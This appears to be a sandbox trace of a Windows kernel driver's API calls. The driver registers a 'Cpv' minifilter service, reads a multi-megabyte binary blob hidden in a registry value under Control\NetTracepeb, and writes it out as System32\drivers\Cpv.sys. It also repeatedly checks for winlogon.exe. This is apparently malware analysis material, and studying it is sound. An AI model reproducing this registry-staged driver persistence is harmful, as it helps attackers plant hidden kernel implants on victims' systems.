| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = Type, TitleIndex = 0x0, Type = 0x4, Data_ptr = 0xffffd00033d28d50, Data = 0x1, DataSize = 0x4, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa, ret_val_ptr_out = 0xffffe0003c634250 | ||||
| _wcsicmp | _String1 = Type, _String2 = ImagePath, ret_val_out = 11 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv\Instances, DestinationString_out = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv\Instances | ||||
| RtlInitUnicodeString | SourceString = DefaultInstance, DestinationString_out = DefaultInstance | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv\Instances, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x1, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = DefaultInstance, TitleIndex = 0x0, Type = 0x1, Data = Cpv Instance, DataSize = 0x1a, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003af95ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8c, ret_val_ptr_out = 0xffffe0003a763d70 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x8c, ObjectNameInfo_unk_out = 0xffffe0003a763d70, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv\Instances, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv\Instances | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20, ret_val_ptr_out = 0xffffe0003c634190 | ||||
| _wcsicmp | _String1 = DefaultInstance, _String2 = ImagePath, ret_val_out = -5 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance, DestinationString_out = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance | ||||
| RtlInitUnicodeString | SourceString = Altitude, DestinationString_out = Altitude | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x1, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = Altitude, TitleIndex = 0x0, Type = 0x1, Data = 399996, DataSize = 0xe, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa8, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0xa6, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x12, ret_val_ptr_out = 0xffffe0003c634190 | ||||
| _wcsicmp | _String1 = Altitude, _String2 = ImagePath, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634190, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = Flags, DestinationString_out = Flags | ||||
| ZwCreateKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, TitleIndex = 0x0, Class_ptr = 0x0, CreateOptions = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fb8, KeyHandle_out = 0xffffffff80000aa0, Disposition_ptr_out = 0xffffd00033d28fa8, Disposition_out = 0x2, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwSetValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = Flags, TitleIndex = 0x0, Type = 0x4, Data_ptr = 0xffffd00033d28d50, Data = 0x0, DataSize = 0x4, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28758, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa8, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa6, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0xa6, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00033d28438, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Cpv\Instances\Cpv Instance | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc, ret_val_ptr_out = 0xffffe0003c634250 | ||||
| _wcsicmp | _String1 = Flags, _String2 = ImagePath, ret_val_out = -3 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwFlushKey | KeyHandle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| RtlInitUnicodeString | SourceString = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb, DestinationString_out = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb | ||||
| RtlInitUnicodeString | SourceString = {197EAD1F-1236-AFFC-192A-2108CED812BA}, DestinationString_out = {197EAD1F-1236-AFFC-192A-2108CED812BA} | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fa8, KeyHandle_out = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = {197EAD1F-1236-AFFC-192A-2108CED812BA}, KeyValueInformationClass_unk = 0x2, Length = 0x4, KeyValueInformation_ptr_out = 0x0, ResultLength_ptr_out = 0xffffd00033d28fa0, ret_val_out = 0xc0000023 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28638, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x88, ret_val_ptr_out = 0xffffe0003af95ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28318, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x86, ret_val_ptr_out = 0xffffe0003a763d70 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x86, ObjectNameInfo_unk_out = 0xffffe0003a763d70, ReturnLength_ptr_out = 0xffffd00033d28318, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NetTracepeb, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NetTracepeb | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ExAllocatePool | PoolType_unk = 0x1, NumberOfBytes_ptr = 0x3af154, ret_val_ptr_out = 0xffffc000bae00000 | ||||
| ZwOpenKey | DesiredAccess_unk = 0xf003f, ObjectAttributes_ptr = 0xffffd00033d28c40, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Registry\Machine\SYSTEM\ControlSet001\Control\NetTracepeb, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, KeyHandle_ptr_out = 0xffffd00033d28fa8, KeyHandle_out = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwQueryValueKey | KeyHandle_unk = 0xffffffff80000aa0, ValueName = {197EAD1F-1236-AFFC-192A-2108CED812BA}, KeyValueInformationClass_unk = 0x2, Length = 0x3af154, KeyValueInformation_ptr_out = 0xffffc000bae00000, KeyValueInformation_deref_TitleIndex_out = 0x0, KeyValueInformation_deref_Type_out = 0x3, KeyValueInformation_deref_DataLength_out = 0x3af148, KeyValueInformation_deref_Data_ptr_out = 0xffffc000bae0000c, KeyValueInformation_deref_Data_deref_data_out = BINARY(offset=24573984,skipped=1,size=0), ResultLength_ptr_out = 0xffffd00033d28fa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28638, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x88, ret_val_ptr_out = 0xffffe0003af95ec0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9d01060, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00033d28318, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x86, ret_val_ptr_out = 0xffffe0003a763d70 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9d01060, Length = 0x86, ObjectNameInfo_unk_out = 0xffffe0003a763d70, ReturnLength_ptr_out = 0xffffd00033d28318, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NetTracepeb, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NetTracepeb | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 | ||||
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| ZwCreateFile | DesiredAccess_unk = 0x10000000, ObjectAttributes_ptr = 0xffffd00033d28b98, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Windows\System32\drivers\Cpv.sys, ObjectAttributes_deref_Attributes = 0x240, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x3, CreateDisposition = 0x5, CreateOptions = 0x60, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd00033d28be0, FileHandle_out = 0xffffffff80000aa0, IoStatusBlock_unk_out = 0xffffd00033d28b88, ret_val_out = 0x0 | ||||
| ZwWriteFile | FileHandle_unk = 0xffffffff80000aa0, Event_unk = 0x0, ApcRoutine_unk = 0x0, ApcContext_ptr = 0x0, Buffer_ptr = 0xffffc000bae0000c, Buffer_deref_data = BINARY(offset=28384162,skipped=1,size=0), Length = 0x3af148, ByteOffset_ptr = 0xffffd00033d28b80, ByteOffset = 0, Key_ptr = 0x0, IoStatusBlock_unk_out = 0xffffd00033d28b88, ret_val_out = 0x0 | ||||
| ZwClose | Handle_unk = 0xffffffff80000aa0, ret_val_out = 0x0 | ||||
